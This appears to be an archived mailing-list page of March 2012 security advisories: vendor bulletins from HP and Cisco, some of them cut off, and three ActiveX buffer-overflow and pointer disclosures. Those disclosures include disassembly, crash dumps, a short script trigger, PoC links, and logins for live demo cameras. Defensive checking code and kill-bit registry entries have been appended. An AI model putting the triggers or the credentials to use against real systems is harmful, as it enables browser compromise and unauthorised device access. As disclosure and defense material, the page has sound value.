WBEMP-FCP.FCP-RUN
action: install revision B.11.31.1203.06.02 or subsequent

HP-UX B.11.31

[security bulletin] HPSBMU02756 SSRT100596 rev.1 - HP Performance Manager Running on HP-UX, Linux, Solaris and Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS)

2012-03-28 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03255321
Version: 1

HPSBMU02756 SSRT100596 rev.1 - HP Performance Manager Running on HP-UX, Linux, 
Solaris and Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-03-27
Last Updated: 2012-03-27

Potential Security Impact: Remote execution of arbitrary code, Denial of 
Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Performance 
Manager running on HP-UX, Linux, Solaris, and Windows. The vulnerability could 
be exploited remotely to execute arbitrary code and to create a Denial of 
Service (DoS).

References: CVE-2012-0127, ZDI-CAN-1340

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Performance Manager v9.00 running on HP-UX, Linux, Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2012-0127  (AV:N/AC:L/Au:N/C:C/I:C/A:C)  10.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luigi Auriemma for working with the 
TippingPoint Zero Day Initiative to report this vulnerability to 
security-al...@hp.com.

RESOLUTION

HP has provided the following patches to resolve the vulnerability. The patches 
are available here: http://support.openview.hp.com/selfsolve/patches

  Operating System  Patch                     Document ID
  HP-UX             PHSS_42753 or subsequent  KM1323069
  Linux             HPPM9L_2 or subsequent    KM1323071
  Solaris           HPPM9S_2 or subsequent    KM1323068
  Windows           HPPM9W_2 or subsequent    KM1323075

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31
HP-UX B.11.23
==
HPOvGC.HPOVGC
HPOvPM.HPOVPM
action: install PHSS_42753 or subsequent

END AFFECTED VERSIONS

HISTORY:
Version:1 (rev.1) - 27 March 2012 Initial Release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental, special 
or consequential damages including downtime cost; lost profits; damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein 

Cisco Security Advisory: Cisco IOS Software RSVP Denial of Service Vulnerability

2012-03-28 Thread Cisco Systems Product Security Incident Response Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Cisco Security Advisory: Cisco IOS Software RSVP Denial of Service Vulnerability

Advisory ID: cisco-sa-20120328-rsvp

Revision 1.0

For Public Release 2012 March 28 16:00  UTC (GMT)

+-

Summary
===

Cisco IOS Software and Cisco IOS XE Software contain a vulnerability
in the RSVP feature when used on a device configured with VPN routing
and forwarding (VRF) instances. This vulnerability could allow an
unauthenticated, remote attacker to cause an interface wedge, which
can lead to loss of connectivity, loss of routing protocol adjacency,
and other denial of service (DoS) conditions. This vulnerability
could be exploited repeatedly to cause an extended DoS condition.

A workaround is available to mitigate this vulnerability.

Cisco has released free software updates that address this
vulnerability. This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120328-rsvp


Note: The March 28, 2012, Cisco IOS Software Security Advisory
bundled publication includes nine Cisco Security Advisories. Each
advisory lists the Cisco IOS Software releases that correct the
vulnerability or vulnerabilities detailed in the advisory as well as
the Cisco IOS Software releases that correct all vulnerabilities in
the March 2012 bundled publication.

Individual publication links are in Cisco Event Response:
Semi-Annual Cisco IOS Software Security Advisory Bundled Publication
at the following link:

http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar12.html


Affected Products
=

Vulnerable Products
+--

Only devices with specific configurations are affected. Cisco devices
that are running affected Cisco IOS Software or Cisco IOS XE Software
versions are vulnerable when they are configured with RSVP and also
have one or more VRF interfaces. A device is vulnerable if both the
following criteria are met:

  * At least one VRF is configured without RSVP
  * At least one other interface (physical or virtual), not in the
same VRF, is configured with RSVP

Some example scenarios are as follows:

  * RSVP-Traffic Engineering (RSVP-TE) in Multiprotocol Label
Switching (MPLS) infrastructures
  * Multi-VRF infrastructures
  * VRF-Lite infrastructures

To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the 
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to Cisco Internetwork Operating System Software or
Cisco IOS Software. The image name displays in parentheses,
followed by Version and the Cisco IOS Software release name. Other
Cisco devices do not have the show version command or may provide
different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 15.0(1)M1 with an installed image name of
C3900-UNIVERSALK9-M:

Router> show version 
Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, 
RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport 
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Wed 02-Dec-09 17:17 by prod_rel_team
!--- output truncated 

Additional information about Cisco IOS Software release naming
conventions is available in White Paper: Cisco IOS and NX-OS
Software Reference Guide at:
http://www.cisco.com/web/about/security/intelligence/ios-ref.html

Products Confirmed Not Vulnerable
+

Cisco IOS-XR software is not affected by this vulnerability.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Cisco IOS Software and Cisco IOS XE Software contain a vulnerability
in the RSVP feature when used on a device configured with VPN routing
and forwarding (VRF) instances.  This vulnerability could allow an
unauthenticated, remote attacker to cause an interface wedge, which
can lead to loss of connectivity, loss of routing protocol adjacency,
and other denial of service (DoS) conditions.  This vulnerability
could be exploited repeatedly to cause an extended DoS condition.

A device is vulnerable if it is configured with VRF and none of the
interfaces in that VRF have RSVP enabled, but any other interface
(physical or virtual) does have RSVP enabled.

An attacker with some knowledge of the affected infrastructure
could exploit this vulnerability by sending RSVP packets to
vulnerable devices. Successful exploitation of the vulnerability
could allow an attacker to wedge the receive queue of any RSVP
ingress interface.

A workaround is available to mitigate this vulnerability.

In devices that meet the vulnerable configuration criteria, valid
RSVP packets could trigger this vulnerability. An attacker with
knowledge

Cisco Security Advisory: Multiple Vulnerabilities in Cisco IOS Software Traffic Optimization Features

2012-03-28 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Multiple Vulnerabilities in Cisco IOS Software
Traffic Optimization Features

Advisory ID: cisco-sa-20120328-mace

Revision 1.0

For Public Release 2012 March 28 16:00  UTC (GMT)

+

Summary
===

Cisco IOS Software contains a denial of service (DoS) vulnerability
in the Wide Area Application Services (WAAS) Express feature that
could allow an unauthenticated, remote attacker to cause the router
to leak memory or to reload.

Cisco IOS Software also contains a DoS vulnerability in the
Measurement, Aggregation, and Correlation Engine (MACE) feature that
could allow an unauthenticated, remote attacker to cause the router
to reload.

An attacker could exploit these vulnerabilities by sending transit
traffic through a router configured with WAAS Express or MACE.
Successful exploitation of these vulnerabilities could allow an
unauthenticated, remote attacker to cause the router to leak memory
or to reload. Repeated exploits could allow a sustained DoS
condition.

Cisco has released free software updates that address these
vulnerabilities. This advisory is available at the following link:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120328-mace


Note: The March 28, 2012, Cisco IOS Software Security Advisory
bundled publication includes nine Cisco Security Advisories. Each
advisory lists the Cisco IOS Software releases that correct the
vulnerability or vulnerabilities detailed in the advisory as well as
the Cisco IOS Software releases that correct all vulnerabilities in
the March 2012 bundled publication.

Individual publication links are in Cisco Event Response:
Semi-Annual Cisco IOS Software Security Advisory Bundled Publication
at the following link:

http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar12.html



Affected Products
=

Vulnerable Products
+--

Cisco devices that are running Cisco IOS Software are vulnerable
when they are configured with the mace enable or waas enable
interface configuration commands on one or more interfaces. Additional
configuration is required for WAAS Express or MACE to be configured;
more details follow.

Note: Cisco IOS Software is vulnerable only when configured for WAAS
Express or MACE. Cisco IOS Software configured for WAAS, not WAAS
Express, is not vulnerable.

For more information on WAAS Express, see
http://www.cisco.com/en/US/products/ps11211/index.html.
For more information about MACE, see
http://www.cisco.com/en/US/prod/collateral/netmgtsw/ps11709/ps11671/guide_c07-664643.html.


To determine the Cisco IOS Software release that is running on a Cisco
product, administrators can log in to the device and issue the show
version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to Cisco Internetwork Operating System Software or Cisco
IOS Software. The image name displays in parentheses, followed by
Version and the Cisco IOS Software release name. Other Cisco devices
do not have the show version command or may provide different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 15.0(1)M1 with an installed image name of
C3900-UNIVERSALK9-M:

Router#show version
Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Wed 02-Dec-09 17:17 by prod_rel_team

!--- output truncated 

Additional information about Cisco IOS Software release
naming conventions is available in White Paper:
Cisco IOS and NX-OS Software Reference Guide at
http://www.cisco.com/web/about/security/intelligence/ios-ref.html.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

The Cisco Wide Area Application Services (WAAS) Express feature allows
optimization of the WAN bandwidth required to access centrally located
applications. WAAS Express allows the traffic to be optimized by a Cisco
Integrated Services Router (ISR G2), with no other devices required.

The Cisco Measurement, Aggregation, and Correlation Engine (MACE) is a
Cisco IOS feature that is used for measurement and analysis of network
traffic. The feature may be used with WAAS Express to give details
of optimized traffic or used by itself to help measure application
performance.

Cisco IOS Software contains a DoS vulnerability in the WAAS Express
feature that could allow an unauthenticated, remote attacker to cause
the router to leak memory or to reload. This vulnerability is documented
in Cisco bug ID CSCtt45381 and has been assigned Common Vulnerabilities
and Exposures (CVE) ID CVE-2012-1314.

Cisco IOS Software

Cisco Security Advisory: Cisco IOS Software Network Address Translation Vulnerability

2012-03-28 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco IOS Software Network Address Translation
Vulnerability

Advisory ID: cisco-sa-20120328-nat

Revision 1.0

For Public Release 2012 March 28 16:00  UTC (GMT)

+

Summary
===

The Cisco IOS Software Network Address Translation (NAT) feature
contains a denial of service (DoS) vulnerability in the translation of
Session Initiation Protocol (SIP) packets.

The vulnerability is caused when packets in transit on the vulnerable
device require translation on the SIP payload.

Cisco has released free software updates that address this
vulnerability. A workaround that mitigates the vulnerability is
available.

This advisory is available at the following link:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120328-nat


Note: The March 28, 2012, Cisco IOS Software Security Advisory bundled
publication includes nine Cisco Security Advisories. Each advisory
lists the Cisco IOS Software releases that correct the vulnerability
or vulnerabilities detailed in the advisory as well as the Cisco IOS
Software releases that correct all vulnerabilities in the March 2012
bundled publication.

Individual publication links are in Cisco Event Response: Semi-Annual
Cisco IOS Software Security Advisory Bundled Publication at the
following link:

http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar12.html


Affected Products
=


Vulnerable Products
+--

Cisco devices that are running Cisco IOS Software are vulnerable when
they are configured for NAT and contain support for NAT for Session
Initiation Protocol.

There are two methods to determine if a device is configured for
NAT: 

  * Determine if NAT is active on a running device.
  * Determine if NAT commands are included in the device
configuration.

Determine if NAT is Active on a Running Device
+-

The preferred method to verify whether NAT is enabled on a Cisco IOS
device is to log in to the device and issue the show ip nat statistics
command. If NAT is active, the sections Outside interfaces and Inside
interfaces will each include at least one interface. The following
example shows a device on which the NAT feature is active:

Router#show ip nat statistics

Total translations: 2 (0 static, 2 dynamic; 0 extended)
Outside interfaces: Serial0
Inside interfaces: Ethernet1
Hits: 135  Misses: 5
Expired translations: 2
Dynamic mappings:
-- Inside Source
access-list 1 pool mypool refcount 2
 pool mypool: netmask 255.255.255.0
start 192.168.10.1 end 192.168.10.254
type generic, total addresses 14, allocated 2 (14%), misses 0

Depending on the Cisco IOS Software release, the interface lists can be
in the lines following the Outside interfaces and Inside interfaces.
In releases that support the section filter on show commands, the
administrator can determine whether NAT is active by using the show
ip nat statistics | section interfaces command, as illustrated in the
following example:

Router#show ip nat statistics | section interfaces
Outside interfaces:
  GigabitEthernet0/0
Inside interfaces:
  GigabitEthernet0/1
Router#

Determine if NAT Commands are Included in the Device Configuration
+-

Alternatively, to determine whether NAT has been enabled in the Cisco
IOS Software configuration, either the ip nat inside or ip nat
outside commands must be present in different interfaces, or in the
case of the NAT Virtual Interface, the ip nat enable interface command
will be present.


Determine the Cisco IOS Software Release
+---

To determine the Cisco IOS Software release that is running on a Cisco
product, administrators can log in to the device and issue the show
version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to Cisco Internetwork Operating System Software or Cisco
IOS Software. The image name displays in parentheses, followed by
Version and the Cisco IOS Software release name. Other Cisco devices
do not have the show version command or may provide different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 15.0(1)M1 with an installed image name of
C3900-UNIVERSALK9-M:

Router#show version
Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Wed 02-Dec-09 17:17 by prod_rel_team

!--- output truncated 

Additional information about Cisco IOS Software release naming
conventions is available in White Paper: Cisco IOS and NX-OS
Software
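As an added scoping check that is not part of either Cisco advisory above, the following Python applies the NAT advisory's test (both interface lists in show ip nat statistics non-empty, or ip nat inside / ip nat outside / ip nat enable on an interface) and the MACE advisory's criterion (mace enable or waas enable on an interface) to captured command output and running-config text; the sample output and configuration are constructed, and both show ip nat statistics layouts the advisory describes are handled.

```python
"""Scoping checks for two advisories in the March 2012 Cisco IOS bundle, using only the
indicators the advisories name: 'show ip nat statistics' output, the ip nat inside /
ip nat outside / ip nat enable interface commands, and mace enable / waas enable."""
import re

# Constructed samples of the two 'show ip nat statistics' layouts the advisory describes.
NAT_STATS_INLINE = "Outside interfaces: Serial0\nInside interfaces: Ethernet1\nHits: 135  Misses: 5\n"
NAT_STATS_INDENTED = "Outside interfaces:\n  GigabitEthernet0/0\nInside interfaces:\n  GigabitEthernet0/1\nHits: 0\n"
# Constructed running-config excerpt; the interface names are made up.
SAMPLE_CONFIG = """!
interface GigabitEthernet0/0
 ip nat outside
!
interface GigabitEthernet0/1
 ip nat inside
 mace enable
!
ip nat inside source list 1 pool mypool
"""

def parse_nat_interfaces(output):
    """Return {'outside': [...], 'inside': [...]} from 'show ip nat statistics' output,
    accepting interface names on the header line or on indented lines below it."""
    result = {"outside": [], "inside": []}
    section = None
    for line in output.splitlines():
        m = re.match(r"^(Outside|Inside) interfaces:\s*(.*)$", line.rstrip())
        if m:
            section = m.group(1).lower()
            result[section] += [i for i in re.split(r"[,\s]+", m.group(2)) if i]
        elif section and line.startswith(" ") and line.strip():
            result[section] += [i for i in re.split(r"[,\s]+", line) if i]
        else:
            section = None  # any other unindented line ends the interface list
    return result

def nat_active(output):
    """The advisory's test: NAT is active when both lists hold at least one interface."""
    ifs = parse_nat_interfaces(output)
    return bool(ifs["outside"] and ifs["inside"])

def interface_stanzas(config):
    """Map each 'interface X' stanza to the list of commands indented under it."""
    stanzas, name = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            name = line.split(None, 1)[1].strip()
            stanzas[name] = []
        elif name and line.startswith(" "):
            stanzas[name].append(line.strip())
        else:
            name = None  # '!' or a global command closes the stanza
    return stanzas

def interfaces_with(config, commands):
    """Interfaces whose stanza holds one of the commands; exact match, so the global
    'ip nat inside source ...' line is never mistaken for the interface command."""
    return sorted(n for n, cmds in interface_stanzas(config).items()
                  if any(c in commands for c in cmds))

def nat_in_config(config):
    return interfaces_with(config, {"ip nat inside", "ip nat outside", "ip nat enable"})

def mace_or_waas_in_config(config):
    return interfaces_with(config, {"mace enable", "waas enable"})
```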

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

2012-03-28 Thread nospam
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest


Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:

File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True


Vulnerability:
This ActiveX control exposes the vulnerable
OpenFileDlg() method, see typelib:

..
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
..

By invoking this method with an overlong argument it is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:


Call stack of main thread
Address    Stack      Procedure / arguments                 Called from          Frame
001279FC   77E6F20B   kernel32.77E637DE                     kernel32.77E6F206    00127A0C
00127A10   0299F958   kernel32.WideCharToMultiByte          UltraMJC.0299F952    00127A0C
00127A14   0003       CodePage = 3
00127A18              Options = 0
00127A1C   03835C5C   WideCharStr =
00127A20              WideCharCount = (-1.)
00127A24   00127A50   MultiByteStr = 00127A50
00127A28   7532       MultiByteCount = 7532 (30002.)
00127A2C              pDefaultChar = NULL
00127A30              pDefaultCharUsed = NULL
00127A3C   029B11D0   UltraMJC.0299F920                     UltraMJC.029B11CB    00127A38


..
0299F934   8B45 08          mov eax,dword ptr ss:[ebp+8]
0299F937   C600 00          mov byte ptr ds:[eax],0
0299F93A   6A 00            push 0
0299F93C   6A 00            push 0
0299F93E   8B4D 10          mov ecx,dword ptr ss:[ebp+10]
0299F941   51               push ecx
0299F942   8B55 08          mov edx,dword ptr ss:[ebp+8]
0299F945   52               push edx
0299F946   6A FF            push -1
0299F948   8B45 0C          mov eax,dword ptr ss:[ebp+C]
0299F94B   50               push eax
0299F94C   6A 00            push 0
0299F94E   8B4D 14          mov ecx,dword ptr ss:[ebp+14]
0299F951   51               push ecx
0299F952   FF15 20319F02    call dword ptr ds:[KERNEL32.WideCharTo   ; kernel32.WideCharToMultiByte
..

The result is that critical structures (SEH) are overwritten,
allowing arbitrary code to be executed in the target browser.
 
As attachment, basic proof of concept code.

original url: http://retrogod.altervista.org/9sg_trendnet_adv.htm

poc: http://retrogod.altervista.org/9sg_trendnet_poc.htm


Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution

2012-03-28 Thread nospam
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll 
Uninitialized Pointer Remote Code Execution 


homepage: http://www.quest.com/intrust/

description: InTrust securely collects, stores, reports and 
alerts on event log data from Windows, Unix and Linux systems, 
helping you comply with external regulations, internal policies 
and security best practices.


download url of a test version:
http://www.quest.com/downloads/

file tested: Quest_InTrust---Full-Package_104.zip


Background:

The mentioned product installs an ActiveX control
with the following settings:

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so 
Internet Explorer will allow scripting of this control
from remote.

Vulnerability:

By invoking the Add() method it is
possible to call into a memory region of choice
set by the attacker through e.g. heap spray or other
techniques.

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>

..
eax=76767676 ebx=4401e51c ecx=01f85340 edx= esi=01f85340 edi=0001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=
..

You are in control of eax: fully exploitable.
As attachment, proof of concept code. 

original url: http://retrogod.altervista.org/9sg_quest_adv.htm

poc: http://retrogod.altervista.org/9sg_quest_poc.htm


D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability

2012-03-28 Thread nospam
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll 
lstrcpyW Remote Buffer Overflow Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
Internet Explorer 7/8

Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink

product homepage: http://www.d-link.com/products/?pid=771

product description:
The DCS-5605 is a high performance camera for professional surveillance 
and remote monitoring. This network camera features motorized pan, 
tilt, and optical/digital zoom for ultimate versatility. The 10x optical 
zoom lens delivers the level of detail necessary to identify faces, license 
plate numbers, and other important details that are difficult to 
clearly distinguish using digital zoom alone

background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True


Vulnerability:
The ActiveX control exposes the SelectDirectory()
method, which takes one optional argument.
See typelib:
..
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
/* VT_VARIANT [12] [in] */ $varDefPath 
)
{
/* method SelectDirectory */
}
..

This method suffers from a stack-based buffer overflow vulnerability
because of an unsafe lstrcpyW() call inside DcsCliCtrl.dll:


..
100712E0   81EC 3404        sub esp,434
100712E6   A1 2C841010      mov eax,dword ptr ds:[1010842C]
100712EB   33C4             xor eax,esp
100712ED   898424 3004      mov dword ptr ss:[esp+430],eax
100712F4   53               push ebx
100712F5   8B9C24 4804      mov ebx,dword ptr ss:[esp+448]
100712FC   55               push ebp
100712FD   8BAC24 4004      mov ebp,dword ptr ss:[esp+440]
10071304   56               push esi
10071305   8BB424 4C04      mov esi,dword ptr ss:[esp+44C]
1007130C   57               push edi
1007130D   8BBC24 4C04      mov edi,dword ptr ss:[esp+44C]
10071314   68 0802          push 208
10071319   8D4424 34        lea eax,dword ptr ss:[esp+34]
1007131D   6A 00            push 0
1007131F   50               push eax
10071320   E8 0BC40300      call DcsCliCt.100AD730
10071325   83C4 0C          add esp,0C
10071328   85F6             test esi,esi
1007132A   74 0C            je short DcsCliCt.10071338
1007132C   56               push esi
1007132D   8D4C24 34        lea ecx,dword ptr ss:[esp+34]
10071331   51               push ecx
10071332   FF15 D4D20C10    call dword ptr ds:[KERNEL32.lstrcpyW]   ; kernel32.lstrcpyW
..

An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to 
the mentioned method and overwriting critical structures (SEH).

As attachment proof of concept code.

Note, to reproduce the wanted crash:
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you get a useless crash; however, it could be
possible that by modifying the poc you will have EIP overwritten as well.


I think that it is also possible that other products might carry this dll,
I could post an update if I find more.

Additional note:

0:029> lm -vm DcsCliCtrl
start    end        module name
0845     0859e000   DcsCliCtrl   (deferred)
    Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
    Image name: DcsCliCtrl.dll
    Timestamp:        Thu Aug 19 08:48:47 2010 (4C6CD3CF)
    CheckSum:         001325EC
    ImageSize:        0014E000
    File version:     1.0.0.4519
    Product version:  1.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        .
    Translations:     0409.04e4
    ProductName:      Camera Streaming Client
    InternalName:     DcsCliCtrl.dll
    OriginalFilename: DcsCliCtrl.dll
    ProductVersion:   1.0.0.1
    FileVersion:      1.0.0.4519
    FileDescription:  Camera Stream Client Control
    LegalCopyright:   Copyright: (c) All rights reserved.

original url: http://retrogod.altervista.org/9sg_dlink_adv.htm
poc: http://retrogod.altervista.org/9sg_dlink_poc.htm
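Added here as a defender's mitigation for the three controls described in the posts above, and not part of any of the original posts: a registry fragment that sets the Internet Explorer kill bit (Compatibility Flags 0x400, as documented in Microsoft KB240797) for each CLSID quoted in the posts, so IE refuses to instantiate the controls regardless of what their IObjectSafety implementation claims.

```reg
Windows Registry Editor Version 5.00

; UltraMJCam device ActiveX Control (TRENDnet TV-IP121WN), CLSID taken from the post above
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}]
"Compatibility Flags"=dword:00000400

; AnnotationX.AnnList (Quest InTrust AnnotateX.dll), CLSID taken from the post above
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EF600D71-358F-11D1-8FD4-00AA00BD091C}]
"Compatibility Flags"=dword:00000400

; DcsCliCtrl.DCSStrmControl (D-Link DCS-5605 DcsCliCtrl.dll), CLSID taken from the post above
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{721700FE-7F0E-49C5-BDED-CA92B7CB1245}]
"Compatibility Flags"=dword:00000400
```

On 64-bit Windows the same keys must also be written under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility so that 32-bit Internet Explorer honours the kill bit.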